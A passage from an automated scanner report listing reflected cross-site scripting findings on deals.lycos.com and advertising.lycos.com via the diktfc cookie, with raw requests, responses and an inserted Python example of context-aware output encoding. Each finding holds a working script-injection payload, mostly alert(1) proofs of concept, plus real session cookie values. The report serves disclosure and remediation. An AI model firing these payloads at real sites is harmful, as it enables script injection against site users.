Host: advertising.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A532cd"><script>alert(1)</script>325056d76aa; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; PENTA=174.121.222.18.1292163893857460; __utmc=207906063; __utmb=207906063.4.10.1292163855;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 14:27:16 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:27:16 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15491

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Advertise@L
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=advertising.lycos.com/index.php&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A532cd"><script>alert(1)</script>325056d76aa.lycos.com&amp;cj=1" alt="tracker" />
...[SNIP]...

1.149. http://deals.lycos.com/ [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97ccd"%3balert(1)//96aec635ab1 was submitted in the diktfc cookie. This input was echoed as 97ccd";alert(1)//96aec635ab1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?utm_source=lycoshome&utm_campaign=home_deals&utm_medium=right_module HTTP/1.1
Host: deals.lycos.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.1.10.1292163855; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2; displayMobile=0; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A97ccd"%3balert(1)//96aec635ab1

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:28:30 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:28:30 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 87695

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/index.php",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A97ccd";alert(1)//96aec635ab1"
});
</script>
...[SNIP]...

1.150. http://deals.lycos.com/ [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4848d"><script>alert(1)</script>8271264fa99 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?utm_source=lycoshome&utm_campaign=home_deals&utm_medium=right_module HTTP/1.1
Host: deals.lycos.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.1.10.1292163855; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2; displayMobile=0; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A4848d"><script>alert(1)</script>8271264fa99

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:28:28 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:28:28 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 87725

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/index.php&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A4848d"><script>alert(1)</script>8271264fa99&amp;cj=1" alt="tracker" />
...[SNIP]...

1.151. http://deals.lycos.com/bootstrap.js [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /bootstrap.js

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b481"><script>alert(1)</script>a5c183e28ee was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bootstrap.js HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3b481"><script>alert(1)</script>a5c183e28ee; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 14:33:26 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:26 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 12920

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/bootstrap.js&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3b481"><script>alert(1)</script>a5c183e28ee&amp;cj=1" alt="tracker" />
...[SNIP]...

1.152. http://deals.lycos.com/bootstrap.js [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /bootstrap.js

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a3373"%3balert(1)//cb851bc2ef was submitted in the diktfc cookie. This input was echoed as a3373";alert(1)//cb851bc2ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
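The following Python is an added example, not code from the XSS.CX report or from deals.lycos.com. It rebuilds the two reflection contexts that recur throughout the diktfc findings in this group, the double-quoted HTML attribute of the scorecardresearch `<img src>` beacon (issue 1.151 and the other attribute-context entries) and the double-quoted JavaScript string in the `COMSCORE.beacon({ c15:"..." })` call (issue 1.152 and the other script-context entries). For each context it places the unencoded rendering the report captured beside a context-aware encoding, then parses the result the way a browser would to show what value actually reaches the beacon. The `render_*` functions are hypothetical stand-ins for the PHP that produced the page; the payloads are the ones the report submitted.

```python
"""Added example (not from the report or the site): the two diktfc reflection
contexts, vulnerable rendering beside context-aware encoding, plus a parser-side
check of what the browser really receives as the c15 value."""
import html
import json
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlencode, urlsplit

SCORECARD = "http://b.scorecardresearch.com/p"
PATH = "deals.lycos.com/bootstrap.js"

# Payloads from issues 1.151 and 1.152: the cookie's hex prefix plus the scanner's marker.
ATTR_PAYLOAD = '013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3b481"><script>alert(1)</script>a5c183e28ee'
JS_PAYLOAD = '013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aa3373";alert(1)//cb851bc2ef'


def render_img_beacon_vulnerable(path, c15):
    # Only '&' is entity-encoded, exactly as in the captured response; '"', '<', '>' pass through.
    qs = "c1=2&c2=6036445&c3=&c4=%s&c5=&c6=&c15=%s&cj=1" % (path, c15)
    return '<img src="%s?%s" alt="tracker" />' % (SCORECARD, qs.replace("&", "&amp;"))


def render_img_beacon_fixed(path, c15):
    # Two nested contexts, two encodings: percent-encode each value as a URL query
    # component, then entity-encode the whole URL as an HTML attribute value.
    qs = urlencode({"c1": 2, "c2": 6036445, "c3": "", "c4": path,
                    "c5": "", "c6": "", "c15": c15, "cj": 1}, safe="/")
    return '<img src="%s" alt="tracker" />' % html.escape(SCORECARD + "?" + qs, quote=True)


JS_TEMPLATE = (
    '<script type="text/javascript">\n'
    "COMSCORE.beacon({\n"
    "c1:2,\n"
    "c2:6036445,\n"
    'c3:"",\n'
    "c4:%s,\n"
    'c5:"",\n'
    'c6:"",\n'
    "c15:%s\n"
    "});\n"
    "</script>"
)


def js_string_literal(value):
    # json.dumps yields a valid double-quoted JS literal with '"' and '\' escaped and all
    # non-ASCII (including U+2028/U+2029) as \uXXXX. Additionally escape '<', '>' and '&'
    # so an inline <script> block can never contain a literal "</script>" from user data.
    out = json.dumps(value)
    for ch, esc in (("<", "\\u003c"), (">", "\\u003e"), ("&", "\\u0026")):
        out = out.replace(ch, esc)
    return out


def render_js_beacon_vulnerable(path, c15):
    # Raw concatenation into a double-quoted literal, as the captured response shows.
    return JS_TEMPLATE % ('"%s"' % path, '"%s"' % c15)


def render_js_beacon_fixed(path, c15):
    return JS_TEMPLATE % (js_string_literal(path), js_string_literal(c15))


class _FirstImg(HTMLParser):
    """Collects the src attribute of the first <img> the parser sees."""

    def __init__(self):
        super().__init__()
        self.src = None

    def handle_starttag(self, tag, attrs):
        if tag == "img" and self.src is None:
            self.src = dict(attrs).get("src")


def attr_c15_as_parsed(markup):
    # The c15 value a browser actually sends: parse the <img>, decode the attribute,
    # split the query string. A break-out shows up as a truncated value.
    p = _FirstImg()
    p.feed(markup)
    if p.src is None:
        return None
    return parse_qs(urlsplit(p.src).query).get("c15", [None])[0]


def js_c15_as_parsed(script):
    # Read the c15 literal the way a JS tokenizer would: one double-quoted string with
    # backslash escapes honoured. A break-out shows up as a truncated value, the rest of
    # the payload having landed outside the string as code.
    i = script.index("c15:") + len("c15:")
    while script[i].isspace():
        i += 1
    if script[i] != '"':
        raise ValueError("c15 is not a double-quoted string literal")
    j = i + 1
    while script[j] != '"':
        j += 2 if script[j] == "\\" else 1
    return json.loads(script[i:j + 1])


if __name__ == "__main__":
    for label, render, check, payload in (
        ("attribute/vulnerable", render_img_beacon_vulnerable, attr_c15_as_parsed, ATTR_PAYLOAD),
        ("attribute/fixed", render_img_beacon_fixed, attr_c15_as_parsed, ATTR_PAYLOAD),
        ("script/vulnerable", render_js_beacon_vulnerable, js_c15_as_parsed, JS_PAYLOAD),
        ("script/fixed", render_js_beacon_fixed, js_c15_as_parsed, JS_PAYLOAD),
    ):
        print("%-22s c15 survives intact: %s" % (label, check(render(PATH, payload)) == payload))
```

In the vulnerable renderings the parsed c15 stops at the payload's first double quote, which is exactly the break-out the report describes; in the fixed renderings the full cookie value round-trips unchanged, so the encoding is lossless as well as safe. Note that the attribute case needs both layers: percent-encoding alone would still leave a raw `&` to be mis-parsed by the HTML tokenizer, and entity-encoding alone would corrupt the query string for any value containing `&` or `=`.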

Request

GET /bootstrap.js HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aa3373"%3balert(1)//cb851bc2ef; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 14:33:27 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:27 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 12888

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/bootstrap.js",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aa3373";alert(1)//cb851bc2ef"
});
</script>
...[SNIP]...

1.153. http://deals.lycos.com/coupons [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /coupons

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a25a4"%3balert(1)//d3e20f2e46f was submitted in the diktfc cookie. This input was echoed as a25a4";alert(1)//d3e20f2e46f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coupons HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aa25a4"%3balert(1)//d3e20f2e46f; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:34 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:34 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42885

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/coupons",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aa25a4";alert(1)//d3e20f2e46f"
});
</script>
...[SNIP]...

1.154. http://deals.lycos.com/coupons [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /coupons

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91ede"><script>alert(1)</script>07af65f492e was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /coupons HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A91ede"><script>alert(1)</script>07af65f492e; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:32 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:32 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42909

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/coupons&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A91ede"><script>alert(1)</script>07af65f492e&amp;cj=1" alt="tracker" />
...[SNIP]...

1.155. http://deals.lycos.com/coupons/stores [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /coupons/stores

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 891ef"><script>alert(1)</script>40c20ce42a6 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /coupons/stores HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A891ef"><script>alert(1)</script>40c20ce42a6; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:31 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:31 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 74634

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/coupons/stores&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A891ef"><script>alert(1)</script>40c20ce42a6&amp;cj=1" alt="tracker" />
...[SNIP]...

1.156. http://deals.lycos.com/coupons/stores [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /coupons/stores

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c07ea"%3balert(1)//565a1b485f was submitted in the diktfc cookie. This input was echoed as c07ea";alert(1)//565a1b485f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coupons/stores HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac07ea"%3balert(1)//565a1b485f; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:33 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:34 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 74602

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/coupons/stores",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac07ea";alert(1)//565a1b485f"
});
</script>
...[SNIP]...

1.157. http://deals.lycos.com/deal/93-off-iphone-4-cases-at-hhi-extra-20-off-413441 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/93-off-iphone-4-cases-at-hhi-extra-20-off-413441

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd5d1"%3balert(1)//99923b16c8b was submitted in the diktfc cookie. This input was echoed as bd5d1";alert(1)//99923b16c8b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/93-off-iphone-4-cases-at-hhi-extra-20-off-413441 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Abd5d1"%3balert(1)//99923b16c8b; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:13 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
